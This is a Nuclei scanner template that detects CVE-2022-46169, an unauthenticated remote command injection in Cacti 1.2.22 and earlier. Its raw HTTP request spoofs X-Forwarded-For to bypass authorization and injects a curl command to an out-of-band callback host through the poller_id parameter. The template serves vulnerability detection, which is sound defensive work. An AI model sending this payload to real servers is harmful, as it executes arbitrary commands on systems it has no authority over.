id: CVE-2022-46169 info: name: Cacti <=1.2.22 - Remote Command Injection author: Hardik-Solanki,j4vaovo severity: critical description: | Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf - https://www.cybersecurity-help.cz/vdb/SB2022121926 - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-46169 cwe-id: CWE-285 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* epss-score: 0.97203 metadata: max-request: 1 shodan-query: title:"Login to Cacti" verified: true tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth variables: useragent: '{{rand_base(6)}}' http: - raw: - | GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1 Host: {{Hostname}} X-Forwarded-For: 127.0.0.1 unsafe: true matchers-condition: and matchers: - type: word part: body words: - '"value":' - '"local_data_id":' condition: and - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: {{useragent}}" - type: status status: - 200 # Enhanced by md on 2023/04/10